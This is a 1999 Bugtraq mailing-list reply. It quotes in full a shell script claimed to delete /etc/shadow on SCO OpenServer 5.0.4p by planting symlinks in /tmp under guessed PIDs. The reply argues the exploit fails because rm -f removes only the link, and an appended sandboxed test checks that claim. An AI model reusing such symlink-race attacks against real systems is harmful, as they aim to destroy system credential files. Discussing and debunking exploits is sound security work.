[9832] in bugtraq


Re: Little exploit for startup scripts (SCO 5.0.4p).

daemon@ATHENA.MIT.EDU (Peter van Dijk)
Mon Mar 8 12:38:32 1999

Mail-Followup-To: BUGTRAQ@NETSPACE.ORG
Date: 	Mon, 8 Mar 1999 08:43:15 +0100
Reply-To: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <AAxlcusyk3@leshka.chuvashia.su>; from leshka on Sun, Mar 07,
              1999 at 03:07:23PM +0300

On Sun, Mar 07, 1999 at 03:07:23PM +0300, leshka wrote:
> #!/bin/sh
> #
> #                                   ... The punishment for inobedience ...
> #                                                   (Cycle # 2)
> #
> #                This simple script can help to erase any file
> #                 (SCO OpenServer Enterprise System v 5.0.4p).

Umm.. I don't think so...

> if [ _$1 = "_" ]
> then
>     {
>      echo -n "File to delete [/etc/shadow]:"
>      read victim_file
>      if [ _$victim_file = "_" ]
>         then
>             victim_file="/etc/shadow"
>         fi
>     }
> else
>     victim_file=$1
> fi

nice.

> pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf  $2 }'`

nice.

> lastpid=`expr $pid - 30`

good thinking!

> while [ $pid != $lastpid ]
>       do
>         pid=`expr $pid - 1`;ln -fs /etc/shadow /tmp/tps$pid

nice.

>       done
> echo Done ! File \"$victim_file\" will be destroyed after the next reboot.

No. rm -f removes just the symlink, not the target file.

Try this (tested on Linux, but SCO doesn't seem too broken to me):
# touch /etc/blah
$ ln -sf /etc/blah /tmp/blih
# rm -f /tmp/blih
# ls -al /etc/blah
-rw-r--r--   1 root     root            0 Mar  8 08:40 /etc/blah

Doesn't look very deleted to me...

Greetz, Peter.
--
.| Peter van Dijk           | <mo|VERWEG> get stoned or code
.| peter@attic.vuurwerk.nl  | <mo|VERWEG> that is the question of life
                            | <mo|VERWEG> code or get stoned
                            | <mo|VERWEG> get stoned AND code
                            | <mo|VERWEG> hmm
                            | <mo|VERWEG> then just get stoned and read slashdot :)

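Added example, not part of the original post: a sandboxed check of the point made in the reply above, that `rm -f` on a symbolic link unlinks the link itself and leaves the target alone, extended here to `rm -rf` on a link that points at a directory. The function name and all paths are made up for the illustration and live in a private `mktemp -d` directory.

```shell
#!/bin/sh
# Added illustration (not from the original post). Every path below is
# constructed inside a private mktemp directory; nothing else is touched.

# check_rm_on_symlink KIND
#   KIND=file : rm -f  on a symlink to a regular file
#   KIND=dir  : rm -rf on a symlink to a directory
# Prints "kept" if the link is gone and the target is intact, else "lost".
check_rm_on_symlink() {
    kind=$1
    sandbox=$(mktemp -d) || return 2
    result=lost
    case $kind in
        file)
            printf 'secret\n' > "$sandbox/target"
            ln -s "$sandbox/target" "$sandbox/link"
            rm -f "$sandbox/link"            # unlinks the link, not the target
            if [ ! -L "$sandbox/link" ] &&
               [ "$(cat "$sandbox/target")" = "secret" ]; then
                result=kept
            fi
            ;;
        dir)
            mkdir "$sandbox/target"
            printf 'secret\n' > "$sandbox/target/inner"
            ln -s "$sandbox/target" "$sandbox/link"
            rm -rf "$sandbox/link"           # -r does not descend through a link
            if [ ! -L "$sandbox/link" ] &&
               [ "$(cat "$sandbox/target/inner")" = "secret" ]; then
                result=kept
            fi
            ;;
        *)
            rm -rf "$sandbox"
            return 2
            ;;
    esac
    rm -rf "$sandbox"                        # clean up the sandbox itself
    printf '%s\n' "$result"
}

for kind in file dir; do
    printf '%s target after rm on the link: %s\n' "$kind" "$(check_rm_on_symlink "$kind")"
done
```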